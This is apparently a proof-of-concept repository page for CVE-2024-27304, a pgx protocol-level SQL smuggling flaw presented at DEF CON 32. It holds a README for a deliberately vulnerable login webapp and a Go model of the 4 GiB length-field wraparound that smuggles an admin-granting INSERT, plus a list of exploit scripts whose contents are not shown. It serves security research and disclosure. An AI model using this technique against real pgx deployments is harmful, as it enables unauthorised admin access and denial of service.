
CVE-2024-27304 PoC — pgx 安全漏洞

Source
Associated Vulnerability
Title: pgx security vulnerability (CVE-2024-27304)
Description: pgx is a PostgreSQL driver and toolkit for Go. pgx has a security vulnerability that allows SQL injection through an overflow of the protocol message size.
Description
PoC for the DEF CON 32 talk "SQL Injection Isn't Dead: Smuggling Queries at the Protocol Level" by Paul Gerste
Readme
# CVE-2024-27304-PoC

## references
- [DEF CON 32 - SQL Injection Isn't Dead Smuggling Queries at the Protocol Level - Paul Gerste](https://www.youtube.com/watch?v=Tfg1B8u1yvE)
- [pgx SQL Injection via Protocol Message Size Overflow](https://github.com/advisories/GHSA-mrww-27vc-gghv)

## webapp
A simple web application with login functionality. Only administrators can log in.

This application uses PostgreSQL and pgx v5.5.3 (vulnerable version).

The attacker's goal is to log in as an administrator by injecting an INSERT into the users table. Because the application passes user input through placeholders, conventional SQL injection does not work.

## exploit
PostgreSQL Message Formats: https://www.postgresql.org/docs/17/protocol-message-formats.html

The exploit depends on which protocol messages pgx sends to the database server when executing SQL.
By default pgx uses the extended protocol: it sends the statement in a `P(Parse)` message and the parameter values in a `B(Bind)` message.
Both messages carry a 32-bit length field. CVE-2024-27304 is that vulnerable pgx versions computed this field without checking that the payload fits in it, so a query or parameter larger than 4 GiB wraps the length: the server reads a message shorter than what was actually sent and parses the remaining bytes as further protocol messages, which is where the attacker's own `Q(Query)` gets smuggled in.

If the following configuration is set, pgx uses the simple protocol instead and sends the query, with the parameters interpolated client-side, as a single `Q(Query)` message:
```go
cfg.ConnConfig.DefaultQueryExecMode = pgx.QueryExecModeSimpleProtocol
```

You can inspect the actual messages on the wire with tcpdump using the `-X` option (hex and ASCII dump).
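
The framing the exploit relies on, as an added example that is not part of this PoC and not pgx's code: a minimal Go model of the simple-protocol `Q` frame showing how narrowing the size to the int32 length field wraps it for a query just over 4 GiB, the range check a hardened encoder performs instead, and a backend-style parser that trusts the declared length and therefore reads the attacker's trailing bytes as a second, complete Query message. The function names, the `users` columns in the smuggled INSERT, and the scaled-down stream (the ~4 GiB of attacker bytes between the prefix and the smuggled message are omitted; only the length field is set to the value the overflow would produce) are assumptions made for the demonstration.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"math"
)

// A simple-protocol Query ('Q') frame as the frontend puts it on the wire:
//   byte   'Q'
//   int32  length, counting the field itself and the body, not the type byte
//   bytes  SQL text, NUL-terminated
const queryOverhead = 4 + 1 // length field + trailing NUL

// unsafeLength models the bug class (illustrative, not pgx's code): the total
// size is narrowed to the int32 wire field with no range check, so a query a
// little over 4 GiB wraps to a small positive value.
func unsafeLength(sqlLen uint64) int32 {
	return int32(uint32(sqlLen + queryOverhead)) // wraps modulo 2^32
}

// safeLength is the hardened form: refuse anything that does not fit.
func safeLength(sqlLen uint64) (int32, error) {
	total := sqlLen + queryOverhead
	if total > math.MaxInt32 {
		return 0, fmt.Errorf("query of %d bytes exceeds the int32 message length", sqlLen)
	}
	return int32(total), nil
}

func appendInt32(dst []byte, v int32) []byte {
	var b [4]byte
	binary.BigEndian.PutUint32(b[:], uint32(v))
	return append(dst, b[:]...)
}

// encodeQuery frames one well-formed Query message with a correct length field.
func encodeQuery(sql string) []byte {
	out := appendInt32([]byte{'Q'}, int32(len(sql)+queryOverhead))
	out = append(out, sql...)
	return append(out, 0)
}

type message struct {
	Type byte
	Body []byte // everything after the length field
}

// parseFrontendMessages splits a stream the way a backend does: read the type
// byte, trust the declared length, and treat whatever follows as the next
// message. Bodies are not validated; a real backend reports an error for a
// malformed first statement and then carries on reading the next message.
func parseFrontendMessages(stream []byte) ([]message, error) {
	var msgs []message
	for len(stream) > 0 {
		if len(stream) < 5 {
			return msgs, errors.New("truncated message header")
		}
		n := int32(binary.BigEndian.Uint32(stream[1:5]))
		if n < 4 || int(n)+1 > len(stream) {
			return msgs, fmt.Errorf("bad length %d for message %q", n, stream[0])
		}
		msgs = append(msgs, message{Type: stream[0], Body: stream[5 : 1+n]})
		stream = stream[1+n:]
	}
	return msgs, nil
}

// overflowedStream builds, scaled down, what the unchecked encoder emits when
// the attacker pads the interpolated query past 4 GiB. With a real query of
// len(prefix) + 2^32 - 1 bytes (the application's prefix followed by the
// attacker's bytes) the wrapped length field is len(prefix) + 4, so the backend
// consumes exactly `prefix` as message 1 and parses the bytes that follow as
// fresh messages. The attacker's ~4 GiB are shrunk here to one well-formed
// Query; the declared length is still the value the overflow yields.
func overflowedStream(prefix, smuggledSQL string) []byte {
	declared := unsafeLength(uint64(1)<<32 + uint64(len(prefix)) - 1)
	out := appendInt32([]byte{'Q'}, declared)
	out = append(out, prefix...)                    // seen as message 1 (malformed)
	return append(out, encodeQuery(smuggledSQL)...) // seen as message 2, executed
}

func main() {
	fmt.Println(unsafeLength(uint64(1)<<32 + 10)) // prints 15
	if _, err := safeLength(uint64(1)<<32 + 10); err != nil {
		fmt.Println("hardened encoder:", err)
	}
	stream := overflowedStream("SELECT id FROM users WHERE name = '",
		"INSERT INTO users (name, is_admin) VALUES ('eve', true)")
	msgs, err := parseFrontendMessages(stream)
	fmt.Println(len(msgs), "messages, err =", err)
	for _, m := range msgs {
		fmt.Printf("%c %q\n", m.Type, m.Body)
	}
}
```

Running it shows the wrapped length (15 for a query of 2^32 + 10 bytes), the hardened encoder refusing the same size, and the parser returning two `Q` messages from one frame: the application's prefix, then the attacker's INSERT. The same arithmetic applies to the `B(Bind)` path, only there the oversized value is a parameter rather than the interpolated query text.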

### scripts

- `Q_simple.py`: Causes the overflow in a `Q(Query)` message. Assumes the attacker knows the executed query exactly (in a black-box setting, brute-forcing is required).
- `Q_nop_sled.py`: Causes the overflow in a `Q(Query)` message; exploitation succeeds within 5 attempts.
- `B_simple.py`: Causes the overflow in a `B(Bind)` message. Assumes the attacker knows the executed query exactly (in my opinion, exploiting `B(Bind)` is difficult in black-box scenarios).

### Notes
- The exploit needs a large amount of memory, because the payload it builds exceeds 4 GiB.
- This exploit sends an extremely large payload and may cause a DoS on the target. As stated in the talk, **do not run this exploit against third-party systems**.
File Snapshot

```
[4.0K] /data/pocs/99100e77725b8d5a061498c244c1c177d73aeca4
├── [4.0K] exploit
│   ├── [ 828] B_simple.py
│   ├── [ 720] Q_nop_sled.py
│   └── [ 797] Q_simple.py
├── [1.8K] README.md
└── [4.0K] webapp
    ├── [ 465] compose.yml
    ├── [ 133] Dockerfile
    ├── [ 382] go.mod
    ├── [2.4K] go.sum
    ├── [ 283] init.sql
    ├── [4.1K] main.go
    └── [4.0K] views
        ├── [  26] home.html
        └── [ 300] login.html

4 directories, 12 files
```